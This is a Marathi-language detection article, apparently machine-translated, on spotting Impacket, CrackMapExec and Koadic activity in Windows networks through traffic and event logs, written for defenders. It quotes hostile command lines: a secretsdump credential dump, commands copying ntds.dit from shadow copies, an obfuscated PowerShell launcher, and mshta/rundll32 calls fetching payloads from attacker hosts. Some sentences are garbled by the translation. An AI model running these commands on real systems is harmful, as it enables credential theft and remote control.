विंडोज इन्फ्रास्ट्रक्चरवर हल्ले कसे शोधायचे: हॅकर टूल्सचा अभ्यास करणे

कॉर्पोरेट क्षेत्रातील हल्ल्यांची संख्या दरवर्षी वाढत आहे: उदाहरणार्थ 2017 मध्ये, 13% अधिक अद्वितीय घटनांची नोंद झाली 2016 पेक्षा, आणि 2018 च्या शेवटी - 27% अधिक घटनामागील कालावधीपेक्षा. त्यासह जेथे मुख्य कार्यरत साधन विंडोज ऑपरेटिंग सिस्टम आहे. 2017-2018 मध्ये, APT ड्रॅगनफ्लाय, APT28, एपीटी मडीवॉटर युरोप, उत्तर अमेरिका आणि सौदी अरेबियामधील सरकारी आणि लष्करी संघटनांवर हल्ले केले. आणि आम्ही यासाठी तीन साधने वापरली - इम्पॅकेट, क्रॅकमॅपेक्सेक и कोआडिक. त्यांचा स्त्रोत कोड खुला आहे आणि GitHub वर उपलब्ध आहे.

हे लक्षात घेण्यासारखे आहे की ही साधने प्रारंभिक प्रवेशासाठी वापरली जात नाहीत, परंतु पायाभूत सुविधांमध्ये आक्रमण विकसित करण्यासाठी वापरली जातात. परिमितीच्या आत प्रवेश केल्यानंतर हल्लेखोर हल्ल्याच्या वेगवेगळ्या टप्प्यांवर त्यांचा वापर करतात. हे, तसे, शोधणे कठीण आहे आणि बर्याचदा केवळ तंत्रज्ञानाच्या मदतीने नेटवर्क रहदारीमध्ये तडजोडीचे ट्रेस ओळखणे किंवा परवानगी देणारी साधने आक्रमणकर्त्याने पायाभूत सुविधांमध्ये प्रवेश केल्यानंतर त्याच्या सक्रिय क्रिया शोधणे. साधने फायली हस्तांतरित करण्यापासून ते रेजिस्ट्रीशी संवाद साधण्यापर्यंत आणि रिमोट मशीनवर कमांड कार्यान्वित करण्यापर्यंत विविध कार्ये प्रदान करतात. या साधनांचा नेटवर्क क्रियाकलाप निश्चित करण्यासाठी आम्ही त्यांचा अभ्यास केला.

आम्हाला काय करण्याची आवश्यकता आहे:

• हॅकिंग साधने कशी कार्य करतात ते समजून घ्या. हल्लेखोरांनी कोणते शोषण करणे आवश्यक आहे आणि ते कोणते तंत्रज्ञान वापरू शकतात ते शोधा.
• हल्ल्याच्या पहिल्या टप्प्यात माहिती सुरक्षा साधनांद्वारे काय आढळले नाही ते शोधा. एकतर हल्लेखोर हा अंतर्गत हल्लेखोर असल्यामुळे किंवा हल्लेखोर पूर्वी माहीत नसलेल्या पायाभूत सुविधांमधील छिद्राचा गैरफायदा घेत असल्यामुळे, टोहण्याचा टप्पा वगळला जाऊ शकतो. त्याच्या कृतींची संपूर्ण साखळी पुनर्संचयित करणे शक्य होते, म्हणून पुढील हालचाली शोधण्याची इच्छा.
• घुसखोरी शोध साधनांमधून खोटे सकारात्मक दूर करा. आपण हे विसरता कामा नये की जेव्हा काही कृती केवळ टोचणीच्या आधारे शोधल्या जातात तेव्हा वारंवार चुका शक्य असतात. सामान्यत: पायाभूत सुविधांमध्ये कोणतीही माहिती मिळविण्यासाठी पुरेसे मार्ग आहेत, जे पहिल्या दृष्टीक्षेपात कायदेशीर मार्गांपेक्षा वेगळे आहेत.

ही साधने हल्लेखोरांना काय देतात? जर हे Impacket असेल, तर हल्लेखोरांना मॉड्यूलची एक मोठी लायब्ररी मिळते जी परिमिती तोडल्यानंतर हल्ल्याच्या वेगवेगळ्या टप्प्यांवर वापरली जाऊ शकते. अनेक साधने अंतर्गतरित्या Impacket मॉड्यूल वापरतात - उदाहरणार्थ, Metasploit. यामध्ये रिमोट कमांड एक्झिक्यूशनसाठी dcomexec आणि wmiexec, Impacket मधून जोडलेल्या मेमरीमधून खाती मिळविण्यासाठी secretsdump आहे. परिणामी, अशा लायब्ररीच्या क्रियाकलापांची योग्य तपासणी केल्याने डेरिव्हेटिव्ह्ज शोधणे सुनिश्चित होईल.

CrackMapExec (किंवा फक्त CME) बद्दल निर्मात्यांनी "Powered by Impacket" लिहिले हा योगायोग नाही. याव्यतिरिक्त, CME कडे लोकप्रिय परिस्थितींसाठी तयार कार्यक्षमता आहे: पासवर्ड किंवा त्यांचे हॅश मिळविण्यासाठी Mimikatz, दूरस्थ अंमलबजावणीसाठी मीटरप्रीटर किंवा एम्पायर एजंटची अंमलबजावणी आणि बोर्डवर ब्लडहाऊंड.

आम्ही निवडलेले तिसरे साधन कोएडिक होते. हे अगदी अलीकडील आहे, ते 25 मध्ये आंतरराष्ट्रीय हॅकर कॉन्फरन्स DEFCON 2017 मध्ये सादर केले गेले होते आणि ते मानक नसलेल्या दृष्टिकोनाने ओळखले जाते: ते HTTP, Java Script आणि Microsoft Visual Basic Script (VBS) द्वारे कार्य करते. या पध्दतीला लिव्हिंग ऑफ लँड असे म्हणतात: हे टूल विंडोजमध्ये तयार केलेल्या अवलंबित्व आणि लायब्ररींचा संच वापरते. निर्माते त्याला COM Command & Control किंवा C3 म्हणतात.

IMPACKET

Impacket ची कार्यक्षमता खूप विस्तृत आहे, AD मध्ये जाणणे आणि अंतर्गत MS SQL सर्व्हरवरून डेटा गोळा करणे, क्रेडेन्शियल्स मिळविण्याच्या तंत्रांपर्यंत: हा एक SMB रिले हल्ला आहे आणि डोमेन कंट्रोलरकडून वापरकर्ता पासवर्डच्या हॅश असलेली ntds.dit फाइल मिळवणे. इम्पॅकेट चार वेगवेगळ्या पद्धतींचा वापर करून दूरस्थपणे कमांड कार्यान्वित करते: WMI, Windows शेड्युलर मॅनेजमेंट सर्व्हिस, DCOM आणि SMB, आणि असे करण्यासाठी क्रेडेन्शियल्सची आवश्यकता असते.

सिक्रेट्सडंप

चला secretsdump वर एक नजर टाकूया. हे एक मॉड्यूल आहे जे वापरकर्ता मशीन आणि डोमेन नियंत्रक दोन्ही लक्ष्य करू शकते. LSA, SAM, SECURITY, NTDS.dit या मेमरी क्षेत्रांच्या प्रती मिळविण्यासाठी याचा वापर केला जाऊ शकतो, त्यामुळे ते हल्ल्याच्या वेगवेगळ्या टप्प्यांवर पाहिले जाऊ शकते. मॉड्यूलच्या ऑपरेशनमधील पहिली पायरी म्हणजे SMB द्वारे प्रमाणीकरण, ज्यासाठी पास द हॅश हल्ला स्वयंचलितपणे पार पाडण्यासाठी वापरकर्त्याचा पासवर्ड किंवा त्याच्या हॅशची आवश्यकता असते. पुढे सर्व्हिस कंट्रोल मॅनेजर (एससीएम) मध्ये प्रवेश उघडण्याची आणि विरेग प्रोटोकॉलद्वारे रेजिस्ट्रीमध्ये प्रवेश मिळविण्याची विनंती येते, ज्याचा वापर करून आक्रमणकर्ता स्वारस्य असलेल्या शाखांचा डेटा शोधू शकतो आणि SMB द्वारे परिणाम मिळवू शकतो.

अंजीर मध्ये. 1 आम्ही पाहतो की winreg प्रोटोकॉल वापरताना, LSA सह रेजिस्ट्री की वापरून प्रवेश कसा मिळवला जातो. हे करण्यासाठी, opcode 15 - OpenKey सह DCERPC कमांड वापरा.

तांदूळ. 1. winreg प्रोटोकॉल वापरून रेजिस्ट्री की उघडणे

पुढे, जेव्हा की ऍक्सेस प्राप्त होतो, तेव्हा मूल्ये opcode 20 सह SaveKey कमांडसह सेव्ह केली जातात. इम्पॅकेट हे अगदी विशिष्ट पद्धतीने करते. हे व्हॅल्यूज फाईलमध्ये सेव्ह करते ज्याचे नाव .tmp सह जोडलेल्या 8 यादृच्छिक वर्णांची स्ट्रिंग आहे. याव्यतिरिक्त, या फाईलचे पुढील अपलोड SMB द्वारे System32 निर्देशिकेतून होते (चित्र 2).

तांदूळ. 2. रिमोट मशीनवरून रेजिस्ट्री की मिळवण्याची योजना

हे निष्पन्न झाले की नेटवर्कवरील अशी क्रियाकलाप winreg प्रोटोकॉल, विशिष्ट नावे, आदेश आणि त्यांचा क्रम वापरून काही रेजिस्ट्री शाखांमध्ये क्वेरीद्वारे शोधला जाऊ शकतो.

हे मॉड्यूल विंडोज इव्हेंट लॉगमध्ये ट्रेस देखील सोडते, ज्यामुळे ते शोधणे सोपे होते. उदाहरणार्थ, कमांड कार्यान्वित करण्याच्या परिणामी

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

विंडोज सर्व्हर 2016 लॉगमध्ये आम्ही खालील प्रमुख इव्हेंटचा क्रम पाहू:

1. 4624 - रिमोट लॉगऑन.
2. 5145 - winreg रिमोट सेवेसाठी प्रवेश अधिकार तपासत आहे.
3. 5145 - System32 निर्देशिकेत फाइल प्रवेश अधिकार तपासत आहे. फाईलमध्ये वर नमूद केलेले यादृच्छिक नाव आहे.
4. 4688 - vssadmin लाँच करणारी cmd.exe प्रक्रिया तयार करणे:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - कमांडसह प्रक्रिया तयार करणे:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - कमांडसह प्रक्रिया तयार करणे:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - कमांडसह प्रक्रिया तयार करणे:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

अनेक पोस्ट-शोषण साधनांप्रमाणे, इम्पॅकेटमध्ये दूरस्थपणे कमांड कार्यान्वित करण्यासाठी मॉड्यूल आहेत. आम्ही smbexec वर लक्ष केंद्रित करू, जे रिमोट मशीनवर परस्पर कमांड शेल प्रदान करते. या मॉड्यूलला पासवर्ड किंवा पासवर्ड हॅशसह SMB द्वारे प्रमाणीकरण देखील आवश्यक आहे. अंजीर मध्ये. आकृती 3 मध्ये आम्ही असे साधन कसे कार्य करते याचे उदाहरण पाहतो, या प्रकरणात ते स्थानिक प्रशासक कन्सोल आहे.

तांदूळ. 3. परस्परसंवादी smbexec कन्सोल

प्रमाणीकरणानंतर smbexec ची पहिली पायरी म्हणजे OpenSCManagerW कमांड (15) सह SCM उघडणे. क्वेरी उल्लेखनीय आहे: मशीननाव फील्ड डमी आहे.

तांदूळ. 4. सेवा नियंत्रण व्यवस्थापक उघडण्याची विनंती

पुढे, CreateServiceW कमांड (12) वापरून सेवा तयार केली जाते. smbexec च्या बाबतीत, आपण प्रत्येक वेळी समान कमांड कन्स्ट्रक्शन लॉजिक पाहू शकतो. अंजीर मध्ये. 5 हिरवा न बदलता येणारा कमांड पॅरामीटर्स दर्शवतो, पिवळा दर्शवतो की आक्रमणकर्ता काय बदलू शकतो. हे पाहणे सोपे आहे की एक्झिक्युटेबल फाइलचे नाव, तिची निर्देशिका आणि आउटपुट फाइल बदलली जाऊ शकते, परंतु इम्पॅकेट मॉड्यूलच्या तर्काला त्रास न देता उर्वरित बदलणे अधिक कठीण आहे.

तांदूळ. 5. सेवा नियंत्रण व्यवस्थापक वापरून सेवा तयार करण्याची विनंती

Smbexec विंडोज इव्हेंट लॉगमध्ये स्पष्ट ट्रेस देखील सोडते. ipconfig कमांडसह इंटरएक्टिव्ह कमांड शेलसाठी Windows Server 2016 लॉगमध्ये, आम्हाला इव्हेंटचा खालील मुख्य क्रम दिसेल:

1. 4697 - पीडितेच्या मशीनवर सेवेची स्थापना:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - बिंदू 1 पासून युक्तिवादांसह cmd.exe प्रक्रियेची निर्मिती.
3. 5145 - C$ निर्देशिकेतील __आउटपुट फाइलचे प्रवेश अधिकार तपासत आहे.
4. 4697 - पीडितेच्या मशीनवर सेवेची स्थापना.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - बिंदू 4 पासून युक्तिवादांसह cmd.exe प्रक्रियेची निर्मिती.
6. 5145 - C$ निर्देशिकेतील __आउटपुट फाइलचे प्रवेश अधिकार तपासत आहे.

आक्रमण साधनांच्या विकासासाठी इम्पॅकेट हा आधार आहे. हे विंडोज इन्फ्रास्ट्रक्चरमधील जवळजवळ सर्व प्रोटोकॉलचे समर्थन करते आणि त्याच वेळी त्याची स्वतःची वैशिष्ट्यपूर्ण वैशिष्ट्ये आहेत. येथे विशिष्ट winreg विनंत्या आहेत, आणि वैशिष्ट्यपूर्ण कमांड फॉर्मेशनसह SCM API चा वापर, आणि फाइल नाव स्वरूप, आणि SMB शेअर SYSTEM32.

CRACKMAPEXEC

CME टूलची रचना प्रामुख्याने त्या नेहमीच्या क्रिया स्वयंचलित करण्यासाठी केली जाते ज्या आक्रमणकर्त्याला नेटवर्कमध्ये पुढे जाण्यासाठी कराव्या लागतात. हे तुम्हाला सुप्रसिद्ध एम्पायर एजंट आणि मीटरप्रीटर यांच्या संयोगाने काम करण्याची परवानगी देते. गुप्तपणे आज्ञा अंमलात आणण्यासाठी, CME त्यांना अस्पष्ट करू शकते. ब्लडहाऊंड (एक वेगळे टोपण साधन) वापरून, आक्रमणकर्ता सक्रिय डोमेन प्रशासक सत्राचा शोध स्वयंचलित करू शकतो.

गुप्त पोलिस

ब्लडहाऊंड, एक स्वतंत्र साधन म्हणून, नेटवर्कमध्ये प्रगत टोपणनास अनुमती देते. हे वापरकर्ते, मशीन, गट, सत्रांबद्दल डेटा संकलित करते आणि पॉवरशेल स्क्रिप्ट किंवा बायनरी फाइल म्हणून पुरवले जाते. माहिती गोळा करण्यासाठी LDAP किंवा SMB-आधारित प्रोटोकॉल वापरले जातात. CME इंटिग्रेशन मॉड्युल ब्लडहाऊंडला पीडितेच्या मशीनवर डाउनलोड करण्याची, कार्यान्वित केल्यानंतर गोळा केलेला डेटा चालवण्यास आणि प्राप्त करण्यास अनुमती देते, ज्यामुळे सिस्टममधील क्रिया स्वयंचलित होतात आणि त्यांना कमी लक्षात येण्यासारखे बनते. ब्लडहाऊंड ग्राफिकल शेल गोळा केलेला डेटा आलेखांच्या स्वरूपात सादर करतो, जो तुम्हाला आक्रमणकर्त्याच्या मशीनपासून डोमेन प्रशासकापर्यंतचा सर्वात लहान मार्ग शोधण्याची परवानगी देतो.

तांदूळ. 6. ब्लडहाउंड इंटरफेस

पीडिताच्या मशीनवर चालण्यासाठी, मॉड्यूल ATSVC आणि SMB वापरून कार्य तयार करते. ATSVC हे विंडोज टास्क शेड्युलरसह काम करण्यासाठी एक इंटरफेस आहे. नेटवर्कवर कार्ये तयार करण्यासाठी CME त्याचे NetrJobAdd(1) फंक्शन वापरते. CME मॉड्यूल काय पाठवते याचे उदाहरण अंजीर मध्ये दाखवले आहे. 7: हा cmd.exe कमांड कॉल आहे आणि XML फॉरमॅटमध्ये वितर्कांच्या स्वरूपात अस्पष्ट कोड आहे.

अंजीर.7. CME द्वारे कार्य तयार करणे

कार्य अंमलबजावणीसाठी सबमिट केल्यानंतर, पीडितेचे मशीन स्वतःच ब्लडहाउंड सुरू करते आणि हे रहदारीमध्ये पाहिले जाऊ शकते. मानक गट, डोमेनमधील सर्व मशीन्स आणि वापरकर्त्यांची सूची आणि SRVSVC NetSessEnum विनंतीद्वारे सक्रिय वापरकर्ता सत्रांबद्दल माहिती मिळविण्यासाठी LDAP क्वेरीद्वारे मॉड्यूलचे वैशिष्ट्य आहे.

तांदूळ. 8. SMB द्वारे सक्रिय सत्रांची सूची प्राप्त करणे

याव्यतिरिक्त, ऑडिटिंग सक्षम असलेल्या पीडिताच्या मशीनवर ब्लडहाऊंड लाँच करणे ID 4688 (प्रक्रिया निर्मिती) आणि प्रक्रियेचे नाव असलेल्या इव्हेंटसह आहे. «C:WindowsSystem32cmd.exe». त्याबद्दल काय उल्लेखनीय आहे ते कमांड लाइन वितर्क आहेत:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avउत्पादने

enum_avproducts मॉड्यूल कार्यक्षमता आणि अंमलबजावणीच्या दृष्टिकोनातून खूप मनोरंजक आहे. WMI तुम्हाला विविध Windows ऑब्जेक्ट्समधून डेटा पुनर्प्राप्त करण्यासाठी WQL क्वेरी भाषा वापरण्याची परवानगी देते, जे मूलत: हे CME मॉड्यूल वापरते. ते AntiSpywareProduct आणि AntiMirusProduct वर्गांना पीडिताच्या मशीनवर स्थापित केलेल्या संरक्षण साधनांबद्दल प्रश्न निर्माण करते. आवश्यक डेटा मिळविण्यासाठी, मॉड्यूल rootSecurityCenter2 नेमस्पेसशी कनेक्ट होते, नंतर WQL क्वेरी तयार करते आणि प्रतिसाद प्राप्त करते. अंजीर मध्ये. आकृती 9 अशा विनंत्या आणि प्रतिसादांची सामग्री दर्शवते. आमच्या उदाहरणात, विंडोज डिफेंडर आढळले.

तांदूळ. 9. enum_avproducts मॉड्यूलची नेटवर्क क्रियाकलाप

बर्‍याचदा, WMI ऑडिटिंग (ट्रेस WMI-क्रियाकलाप), ज्याच्या इव्हेंटमध्ये तुम्हाला WQL क्वेरीबद्दल उपयुक्त माहिती मिळू शकते, ती अक्षम केली जाऊ शकते. परंतु जर ते सक्षम केले असेल, तर enum_avproducts स्क्रिप्ट चालवल्यास, ID 11 सह एक इव्हेंट जतन केला जाईल. त्यात विनंती पाठवलेल्या वापरकर्त्याचे नाव आणि rootSecurityCenter2 नेमस्पेसमध्ये नाव असेल.

प्रत्येक CME मॉड्यूलची स्वतःची कलाकृती होती, मग ती विशिष्ट WQL क्वेरी असोत किंवा LDAP आणि SMB मधील अस्पष्टता आणि ब्लडहाऊंड-विशिष्ट क्रियाकलाप असलेल्या टास्क शेड्युलरमध्ये विशिष्ट प्रकारच्या टास्कची निर्मिती असो.

कोआडिक

Koadic चे एक विशिष्ट वैशिष्ट्य म्हणजे Windows मध्ये तयार केलेले JavaScript आणि VBScript दुभाष्यांचा वापर. या अर्थाने, ते लिव्हिंग ऑफ द लँड ट्रेंडचे अनुसरण करते - म्हणजेच, त्यात कोणतेही बाह्य अवलंबित्व नाही आणि मानक विंडोज टूल्स वापरतात. हे संपूर्ण कमांड अँड कंट्रोल (CnC) साठी एक साधन आहे, कारण संक्रमणानंतर मशीनवर "इम्प्लांट" स्थापित केले जाते, ज्यामुळे ते नियंत्रित केले जाऊ शकते. अशा मशीनला, कोएडिक शब्दावलीत, "झोम्बी" म्हणतात. पीडितेच्या बाजूने पूर्ण ऑपरेशनसाठी अपुरे विशेषाधिकार असल्यास, Koadic कडे वापरकर्ता खाते नियंत्रण बायपास (UAC बायपास) तंत्र वापरून त्यांना वाढवण्याची क्षमता आहे.

तांदूळ. 10. कोआडिक शेल

पीडितेने कमांड आणि कंट्रोल सर्व्हरसह संप्रेषण सुरू केले पाहिजे. हे करण्यासाठी, तिला पूर्वी तयार केलेल्या यूआरआयशी संपर्क साधण्याची आणि स्टेजर्सपैकी एक वापरून मुख्य कोएडिक शरीर प्राप्त करणे आवश्यक आहे. अंजीर मध्ये. आकृती 11 mshta स्टेजरचे उदाहरण दाखवते.

तांदूळ. 11. CnC सर्व्हरसह सत्र सुरू करणे

प्रतिसाद व्हेरिएबल WS च्या आधारे, हे स्पष्ट होते की अंमलबजावणी WScript.Shell द्वारे होते आणि STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE व्हेरिएबल्समध्ये चालू सत्राच्या पॅरामीटर्सबद्दल मुख्य माहिती असते. सीएनसी सर्व्हरसह HTTP कनेक्शनमधील ही पहिली विनंती-प्रतिसाद जोडी आहे. त्यानंतरच्या विनंत्या थेट मॉड्युल्स (इम्प्लांट) च्या कार्यक्षमतेशी संबंधित आहेत. सर्व कोएडिक मॉड्यूल्स केवळ CnC सह सक्रिय सत्रासह कार्य करतात.

मिमिकॅट्ज

जसे CME Bloodhound सह कार्य करते, Koadic Mimikatz सोबत स्वतंत्र प्रोग्राम म्हणून कार्य करते आणि ते लाँच करण्याचे अनेक मार्ग आहेत. खाली Mimikatz इम्प्लांट डाउनलोड करण्यासाठी विनंती-प्रतिसाद जोडी आहे.

तांदूळ. 12. Mimikatz Koadic ला हस्तांतरित करा

विनंतीमधील URI फॉरमॅट कसा बदलला आहे ते तुम्ही पाहू शकता. त्यात आता csrf व्हेरिएबलचे मूल्य आहे, जे निवडलेल्या मॉड्यूलसाठी जबाबदार आहे. तिच्या नावाकडे लक्ष देऊ नका; आपल्या सर्वांना माहित आहे की CSRF सहसा वेगळ्या पद्धतीने समजला जातो. प्रतिसाद हा Koadic चा समान मुख्य भाग होता, ज्यामध्ये Mimikatz शी संबंधित कोड जोडला गेला होता. ते खूप मोठे आहे, म्हणून मुख्य मुद्दे पाहू. येथे आमच्याकडे बेस64 मध्ये एन्कोड केलेली Mimikatz लायब्ररी आहे, एक अनुक्रमिक .NET वर्ग जो त्यास इंजेक्ट करेल आणि Mimikatz लाँच करण्यासाठी युक्तिवाद करेल. अंमलबजावणीचा परिणाम स्पष्ट मजकुरात नेटवर्कवर प्रसारित केला जातो.

तांदूळ. 13. रिमोट मशीनवर Mimikatz चालवण्याचा परिणाम

Exec_cmd

Koadic कडे मॉड्यूल्स देखील आहेत जे दूरस्थपणे कमांड कार्यान्वित करू शकतात. येथे आपण समान URI जनरेशन पद्धत आणि परिचित sid आणि csrf व्हेरिएबल्स पाहू. exec_cmd मॉड्यूलच्या बाबतीत, कोड शरीरात जोडला जातो जो शेल कमांड कार्यान्वित करण्यास सक्षम आहे. खाली CnC सर्व्हरच्या HTTP प्रतिसादात असा कोड दर्शविला आहे.

तांदूळ. 14. इम्प्लांट कोड exec_cmd

परिचित WS विशेषता असलेले GAWTUUGCFI व्हेरिएबल कोड अंमलबजावणीसाठी आवश्यक आहे. त्याच्या मदतीने, इम्प्लांट शेलला कॉल करते, कोडच्या दोन शाखांवर प्रक्रिया करते - shell.exec आउटपुट डेटा प्रवाह आणि shell.run परत न करता.

कोआडिक हे एक सामान्य साधन नाही, परंतु त्याच्या स्वतःच्या कलाकृती आहेत ज्याद्वारे ते कायदेशीर रहदारीमध्ये आढळू शकतात:

• HTTP विनंत्यांची विशेष निर्मिती,
• winHttpRequests API वापरून,
• ActiveXObject द्वारे WScript.Shell ऑब्जेक्ट तयार करणे,
• मोठी एक्झिक्युटेबल बॉडी.

प्रारंभिक कनेक्शन स्टेजरद्वारे सुरू केले जाते, त्यामुळे विंडोज इव्हेंटद्वारे त्याची क्रियाकलाप शोधणे शक्य आहे. mshta साठी, हा इव्हेंट 4688 आहे, जो प्रारंभ गुणधर्मासह प्रक्रिया तयार करण्यास सूचित करतो:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

कोएडिक चालू असताना, तुम्ही इतर 4688 इव्हेंट्स पाहू शकता ज्यात त्याचे वैशिष्ट्यपूर्ण वैशिष्ट्य आहे:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

निष्कर्ष

लिव्हिंग ऑफ द लँड ट्रेंड गुन्हेगारांमध्ये लोकप्रिय होत आहे. ते त्यांच्या गरजांसाठी विंडोजमध्ये तयार केलेली साधने आणि यंत्रणा वापरतात. आम्ही लोकप्रिय साधने पहात आहोत Koadic, CrackMapExec आणि Impacket या तत्त्वाचे अनुसरण करून APT अहवालांमध्ये वाढत्या प्रमाणात दिसून येत आहे. या साधनांसाठी GitHub वर फॉर्क्सची संख्या देखील वाढत आहे आणि नवीन दिसू लागले आहेत (आता त्यापैकी सुमारे एक हजार आधीच आहेत). ट्रेंड त्याच्या साधेपणामुळे लोकप्रिय होत आहे: हल्लेखोरांना तृतीय-पक्ष साधनांची आवश्यकता नाही; ते आधीच पीडितांच्या मशीनवर आहेत आणि त्यांना सुरक्षा उपायांना बायपास करण्यात मदत करतात. आम्ही नेटवर्क कम्युनिकेशनचा अभ्यास करण्यावर लक्ष केंद्रित करतो: वर वर्णन केलेले प्रत्येक साधन नेटवर्क रहदारीमध्ये स्वतःचे ट्रेस सोडते; त्यांच्या तपशीलवार अभ्यासामुळे आम्हाला आमचे उत्पादन शिकवता आले पीटी नेटवर्क हल्ला शोध त्यांना शोधून काढा, जे शेवटी सायबर घटनांच्या संपूर्ण साखळीचा तपास करण्यास मदत करते.

लेखक:

• अँटोन ट्युरिन, तज्ञ सेवा विभागाचे प्रमुख, पीटी तज्ञ सुरक्षा केंद्र, सकारात्मक तंत्रज्ञान
• एगोर पॉडमोकोव्ह, तज्ञ, पीटी तज्ञ सुरक्षा केंद्र, सकारात्मक तंत्रज्ञान

स्त्रोत: www.habr.com